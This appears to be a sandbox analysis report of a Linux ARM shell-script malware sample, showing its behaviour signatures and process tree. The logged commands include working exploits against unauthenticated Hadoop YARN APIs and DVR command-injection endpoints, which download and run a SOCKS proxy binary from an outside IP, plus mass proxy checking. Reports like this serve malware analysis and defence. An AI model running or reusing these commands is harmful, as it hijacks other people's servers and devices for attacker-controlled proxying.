Analysis

  • max time kernel
    6s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20260513-en
  • resource tags

    arch:armhfimage:debian9-armhf-20260513-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    22/08/2026, 14:06

General

  • Target
    c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
  • Size 3KB
  • Sample260822-rertkavfjg
  • SHA256 c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
  • MD5 SHA1 SHA512 TLSH

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to shm directory 9 IoCs

    Malware can drop malicious files in the shm directory which will run directly from RAM.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
    /tmp/c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
    1⤵
    • Writes file to shm directory
    • Writes file to tmp directory
    PID:643
    • /usr/bin/pgrep
      pgrep -f "masscan.*targeted"
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:649
    • /bin/date
      date "+%H:%M:%S"
      2⤵
        PID:659
      • /bin/sleep
        sleep 5
        2⤵
          PID:662
        • /bin/grep
          grep -v "^#" /dev/shm/.sys/raw.txt
          2⤵
            PID:749
          • /usr/bin/awk
            awk "{print \$4\":\"\$3}"
            2⤵
            • Reads runtime system information
            PID:750
          • /bin/date
            date "+%H:%M:%S"
            2⤵
              PID:752
            • /bin/grep
              grep ":8088\$" /dev/shm/.sys/ips.txt
              2⤵
              • System Network Configuration Discovery
              PID:755
            • /usr/bin/cut
              cut -d: -f1
              2⤵
                PID:756
              • /usr/bin/cut
                cut -d: -f1
                2⤵
                  PID:759
                • /bin/grep
                  grep ":8080\$" /dev/shm/.sys/ips.txt
                  2⤵
                  • System Network Configuration Discovery
                  PID:758
                • /usr/bin/cut
                  cut -d: -f1
                  2⤵
                    PID:762
                  • /bin/grep
                    grep ":80\$" /dev/shm/.sys/ips.txt
                    2⤵
                    • System Network Configuration Discovery
                    PID:761
                  • /usr/bin/cut
                    cut -d: -f1
                    2⤵
                      PID:765
                    • /bin/grep
                      grep ":23\$" /dev/shm/.sys/ips.txt
                      2⤵
                      • System Network Configuration Discovery
                      PID:764
                    • /bin/date
                      date "+%H:%M:%S"
                      2⤵
                        PID:778
                      • /bin/cat
                        cat /dev/shm/.sys/pproxy.txt
                        2⤵
                          PID:779
                        • /usr/bin/xargs
                          xargs -P 500 "-I{}" sh -c "code=\$(curl -s -m 3 -o /dev/null -w \"%{http_code}\" -x http://{} http://httpbin.org/ip 2>/dev/null); [ \"\$code\" = \"200\" ] && echo {}"
                          2⤵
                          • System Network Configuration Discovery
                          PID:780
                        • /usr/bin/sort
                          sort -u
                          2⤵
                            PID:783
                          • /bin/cat
                            cat /dev/shm/.sys/p8080.txt /dev/shm/.sys/p80.txt
                            2⤵
                              PID:782
                            • /usr/bin/xargs
                              xargs -P 500 "-I{}" sh -c "for p in 80 8080; do code=\$(curl -s -m 3 -o /dev/null -w \"%{http_code}\" -x http://{}:\$p http://httpbin.org/ip 2>/dev/null); [ \"\$code\" = \"200\" ] && echo \"{}:\$p\" && break; done"
                              2⤵
                              • Reads runtime system information
                              • System Network Configuration Discovery
                              PID:784
                            • /usr/bin/sort
                              sort -u /dev/shm/.sys/verified_http.txt -o /dev/shm/.sys/verified_http.txt
                              2⤵
                                PID:786
                              • /bin/date
                                date "+%H:%M:%S"
                                2⤵
                                  PID:789
                                • /bin/cat
                                  cat /dev/shm/.sys/p8088.txt
                                  2⤵
                                    PID:790
                                  • /usr/bin/xargs
                                    xargs -P 100 "-I{}" sh -c " resp=\$(curl -s -m 5 \"http://{}:8088/ws/v1/cluster/info\" 2>/dev/null) echo \"\$resp\" | grep -q clusterInfo && { app=\$(curl -s -m 5 -X POST \"http://{}:8088/ws/v1/cluster/apps/new-application\" 2>/dev/null) appid=\$(echo \"\$app\" | python3 -c \"import json,sys;print(json.load(sys.stdin).get(\\\"application-id\\\",\\\"\\\"))\" 2>/dev/null) [ -n \"\$appid\" ] && { cmd=\"wget http://159.89.206.122:8888/microsocks -O /tmp/.ms;chmod +x /tmp/.ms;/tmp/.ms -p 1080 &\" curl -s -m 5 -X POST \"http://{}:8088/ws/v1/cluster/apps\" -H \"Content-Type: application/json\" -d \"{\\\"application-id\\\":\\\"\$appid\\\",\\\"application-name\\\":\\\"svc\\\",\\\"am-container-spec\\\":{\\\"commands\\\":{\\\"command\\\":\\\"\$cmd\\\"}},\\\"application-type\\\":\\\"YARN\\\"}\" 2>/dev/null sleep 5 check=\$(curl -s -m 5 -x socks5://{}:1080 http://httpbin.org/ip 2>/dev/null) echo \"\$check\" | grep -q origin && echo \"{}:1080\" >> /dev/shm/.sys/yarn_exploited.txt } } "
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:791
                                  • /bin/date
                                    date "+%H:%M:%S"
                                    2⤵
                                      PID:794
                                    • /usr/bin/sort
                                      sort -u
                                      2⤵
                                        PID:796
                                      • /bin/cat
                                        cat /dev/shm/.sys/p80.txt /dev/shm/.sys/p8080.txt
                                        2⤵
                                          PID:795
                                        • /usr/bin/xargs
                                          xargs -P 200 "-I{}" sh -c " for path in /dvr/cmd /cn/cmd; do resp=\$(curl -s -m 3 \"http://{}\$path\" 2>/dev/null) if [ -n \"\$resp\" ]; then curl -s -m 3 -X POST \"http://{}\$path\" -d \"cmd=wget http://159.89.206.122:8888/microsocks -O /tmp/.ms;chmod +x /tmp/.ms;/tmp/.ms -p 1080 &\" 2>/dev/null sleep 3 check=\$(curl -s -m 5 -x socks5://{}:1080 http://httpbin.org/ip 2>/dev/null) echo \"\$check\" | grep -q origin && echo \"{}:1080\" && break fi done "
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:797
                                        • /bin/date
                                          date "+%H:%M:%S"
                                          2⤵
                                            PID:801
                                          • /usr/bin/sort
                                            sort -u
                                            2⤵
                                              PID:803
                                            • /bin/cat
                                              cat /dev/shm/.sys/verified_http.txt /dev/shm/.sys/yarn_exploited.txt /dev/shm/.sys/dvr_exploited.txt /tmp/global.txt
                                              2⤵
                                                PID:802
                                              • /bin/mv
                                                mv /tmp/global_new.txt /tmp/global.txt
                                                2⤵
                                                  PID:804
                                                • /bin/sed
                                                  sed -i "s#^.*://##" /tmp/global.txt
                                                  2⤵
                                                  • Reads runtime system information
                                                  • Writes file to tmp directory
                                                  PID:805
                                                • /bin/date
                                                  date "+%H:%M:%S"
                                                  2⤵
                                                    PID:806
                                                  • /usr/bin/wc
                                                    wc -l
                                                    2⤵
                                                      PID:814
                                                    • /bin/date
                                                      date "+%H:%M:%S"
                                                      2⤵
                                                        PID:815

                                                    Network

                                                          MITRE ATT&CK Enterprise v16

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads